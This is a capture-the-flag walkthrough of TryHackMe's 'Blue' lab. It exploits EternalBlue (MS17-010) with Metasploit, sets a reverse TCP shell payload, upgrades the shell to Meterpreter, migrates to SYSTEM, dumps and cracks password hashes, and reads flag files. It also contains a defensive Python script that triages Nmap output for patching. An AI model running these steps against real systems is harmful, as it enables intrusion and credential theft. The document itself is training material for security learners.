Eternal Blue Exploitation – Walkthrough
Many organizations still have this vulnerability on their network: most of the machines vulnerable to this exploit are running legacy systems, their users are not comfortable migrating to newer versions of Windows, or the systems administrators have not kept the systems updated. But what is the risk? Below is a walkthrough of the vulnerability being exploited by attackers.
Here is the room: https://tryhackme.com/room/blue. Before we begin, we need to connect to the TryHackMe internal network, either by using the attack box or the VPN provided. Using the attack box is straightforward, but in case you are not familiar with how to connect via OpenVPN, please visit https://tryhackme.com/room/openvpn
What is Eternal Blue?
Officially named MS17-010 by Microsoft, EternalBlue exploits a vulnerability in the Microsoft implementation of the Server Message Block (SMB) protocol.
It targets a Windows machine that has not been patched against the vulnerability, tricking it into accepting illegitimate data packets on the legitimate network. These packets can carry malware such as ransomware or other similar malicious programs.
On this machine we are going to use the Metasploit framework, since it has an exploit module for remote code execution, meaning we can execute code on the target machine remotely.
Disclaimer: some of the IP addresses may vary because of switching between OpenVPN and the online attack box.
[Task 1] Reconnaissance
(#1) As with everything, we'll start by gathering information about our target machine. We'll use Nmap to check for open ports and the services running on them:
$ nmap -A -T4 <ip_addr>
• -A = aggressive scan, i.e. service versions, default scripts, OS detection and traceroute
• -T4 = aggressive (4) timing template for faster scans
From the results we'll look for an entry point into the box. SMB looks like a great way in: we know that SMBv1 has various vulnerabilities that we could exploit. We also notice that our target is running Windows 7, which has a lot of known vulnerabilities.
(#2) Simply count the number of open ports with a port number below 1000.
(#3) Finding Vulnerabilities
Since SMB is going to be our initial point of entry, we'll run scripts to enumerate it further. We'll start with EternalBlue, or MS17-010, which affects SMBv1 servers on Microsoft systems. The machine is running Windows 7 and could be affected by this vulnerability.
We'll run the following command:
$ nmap -p 445 --script=smb-vuln-ms17-010.nse <ip_addr>
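As an added example (not part of the original walkthrough), here is a small Python script a defender could run over saved output of the two Nmap commands above to triage their own hosts: it counts the open ports below 1000 per host (the Task 1 question), captures the 445/tcp service banner, and flags any host whose smb-vuln-ms17-010 script block reports State: VULNERABLE as a critical patch candidate. The embedded scan text is constructed sample data for two hypothetical hosts, not a real scan; the nmap script only prints a result block when it finds the host vulnerable, so the patched host has none.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List

# Constructed sample of `nmap -A` normal output plus the smb-vuln-ms17-010
# script block, for two hypothetical hosts (not real scan data).
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 10.10.0.5
Host is up (0.041s latency).
Not shown: 994 closed ports
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds
3389/tcp  open  ms-wbt-server
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC

Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|_    Risk factor: HIGH

Nmap scan report for 10.10.0.6
Host is up (0.039s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
445/tcp open  microsoft-ds Microsoft Windows Server 2016 microsoft-ds
"""

# "Nmap scan report for <host>" starts a new per-host section.
HOST_RE = re.compile(r"^Nmap scan report for (?P<host>\S+)")
# One row of the port table: "445/tcp   open  microsoft-ds <version banner>".
PORT_RE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
    r"(?:\s+(?P<version>.*))?$"
)
# Header line of an NSE script block ("| name:" or "|_name:"). Nested lines
# carry extra indentation after the "|" and therefore do not match.
SCRIPT_RE = re.compile(r"^\|(?:_| )(?P<script>[\w-]+):")
STATE_RE = re.compile(r"^\|\s+State:\s+(?P<state>\S+)")


@dataclass
class HostFinding:
    host: str
    open_ports: List[int] = field(default_factory=list)
    smb_banner: str = ""                # version column of the 445/tcp row
    ms17_010_state: str = "NO_FINDING"  # "VULNERABLE" when the script says so

    def open_ports_below(self, limit: int = 1000) -> int:
        """Count open ports numbered below `limit` (the Task 1 question)."""
        return sum(1 for p in self.open_ports if p < limit)

    def priority(self) -> str:
        """Patch-priority bucket a defender would assign from this scan alone."""
        if self.ms17_010_state == "VULNERABLE":
            return "CRITICAL"
        if 445 in self.open_ports:
            return "REVIEW"  # SMB exposed: confirm SMBv1 is off and patches applied
        return "LOW"


def parse_nmap_output(text: str) -> Dict[str, HostFinding]:
    """Parse nmap normal output into per-host findings keyed by address."""
    findings: Dict[str, HostFinding] = {}
    current = None
    current_script = None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            current = HostFinding(host=m.group("host"))
            findings[current.host] = current
            current_script = None
            continue
        if current is None:
            continue
        m = PORT_RE.match(line)
        if m:
            if m.group("state") == "open":
                port = int(m.group("port"))
                current.open_ports.append(port)
                if port == 445:
                    current.smb_banner = m.group("version") or ""
            continue
        m = SCRIPT_RE.match(line)
        if m:
            current_script = m.group("script")
            continue
        m = STATE_RE.match(line)
        if m and current_script == "smb-vuln-ms17-010":
            current.ms17_010_state = m.group("state")
    return findings


def triage(text: str) -> List[str]:
    """Return one summary line per host, most urgent first."""
    order = {"CRITICAL": 0, "REVIEW": 1, "LOW": 2}
    rows = sorted(parse_nmap_output(text).values(), key=lambda f: order[f.priority()])
    return [
        f"{f.priority():8} {f.host:15} open<1000={f.open_ports_below()} "
        f"ms17-010={f.ms17_010_state} smb={f.smb_banner or '-'}"
        for f in rows
    ]


if __name__ == "__main__":
    print("\n".join(triage(SAMPLE_NMAP_OUTPUT)))
```

Feed it the saved output of a scan over your own subnet (for example `nmap -A -T4 --script=smb-vuln-ms17-010 <range> -oN scan.txt`) and the CRITICAL rows are the hosts to patch or isolate first; REVIEW rows expose SMB but gave no script finding, so they still deserve a check that SMBv1 is disabled and the MS17-010 update is installed.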
[Task 2] Gain Access
(#1) After determining that our target machine is indeed vulnerable to EternalBlue, we'll fire up Metasploit to exploit it.
Run the command msfconsole
(#2) Once Metasploit is up and running, search for the EternalBlue exploit. We'll pick the first one that shows EternalBlue and select it.
(#3) We want to set the payload to a reverse shell; this will be our initial foothold before getting a more powerful Meterpreter shell.
set payload windows/x64/shell/reverse_tcp
(#4) We'll set the module options accordingly: RHOSTS points to the target machine, while LHOST is our listening machine. Any field whose Required column says yes must be set. To view what needs to be set, use the command show options
(#5) With everything set we can run our exploit. Let's keep our fingers crossed for a shell as Metasploit runs. Whoo-hoo! It worked, looks like we got a shell, awesome!!
We'll run the whoami command to see which user we are in the operating system; NT AUTHORITY\SYSTEM is the built-in local system account.
(#6) We need to upgrade this shell to Meterpreter in order to run more powerful commands on the target. First, however, we need to send the shell to the background with CTRL+Z.
[Task 3] Escalate
(#1) After getting a shell on the machine we want to upgrade it to a more powerful Meterpreter shell, which will allow us to run more administrative tasks. To do that we'll send our session to the background and search for a module that upgrades a shell to Meterpreter. We'll run the following command: search shell_to_meterpreter
(#2) Next, we'll look at the options that we are required to set for this module to upgrade from the regular shell to a more powerful Meterpreter shell.
(#3) From the options we see that SESSION is the only required field; however, we also need to set LHOST even though its Required column says no. SESSION must be set to the ID of the shell session we got in the previous step. In most cases this is 1, but we can confirm it by listing all active sessions.
We'll run the following command: sessions -l
(#4) After setting SESSION to 1, the same as the previous shell session, we can run the module, cross our fingers and hope for a Meterpreter shell.
And it looks like we got a Meterpreter shell.
(#5) We'll now need to list all active sessions again, since the above module does not drop us into our Meterpreter session. Again we'll run the list-all-sessions command: sessions -l
(#6) We'll choose session 2 to interact with the Meterpreter shell: sessions -i 2
(#7) Running the Meterpreter shell allows us to perform more administrative tasks than we could with the regular shell. We'll run the ps command to list all running processes.
(#8) We want to migrate to a process that is running as NT AUTHORITY\SYSTEM, so we'll pick one and run the command migrate <process_id>
If we are successful, we'll get a "Migration completed successfully" message; you may have to try this a few times, as the shell is not stable. We are now running as the user with the highest administrative rights on the system, i.e. the administrator.
[Task 4] Cracking
(#1) As the administrator we can view all users on the system and their password hashes. We'll proceed to do just that. We'll run the command hashdump, which dumps all the user IDs and password hashes stored in the local SAM database.
(#2) Now that we have the password hashes, we'll use different tools to crack them; among the tools we could use are hashcat and John the Ripper. We could also use an online tool like CrackStation, which would work just fine. Let's crack Jon's password hash to get the answer to the next section.
[Task 5] Find Flags
(#1) Next, we'll proceed to find the flags for the next sections. According to the first hint, the flag is found in the system root. To get there we'll change directory to the root of the drive with the following command: cd \
We read the contents of flag1.txt.
(#2) The second flag is stored where passwords are stored in Windows, so we'll have to navigate to that location. By default, Windows stores its password hashes in the Windows\system32\Config directory.
List the files within this folder and you will see a flag2.txt file. To get the 2nd flag we'll read flag2.txt.
(#3) The third and final flag is stored in a place that has a lot of interesting things saved. So the first thing that comes to mind is the Documents folder; let's head over there and see what we have.
We'll run the following command to change directory to Jon's Documents folder.
We finally have our final flag by running the cat command.
Hurray!! You have successfully completed the Blue machine; we hope you have learnt something new.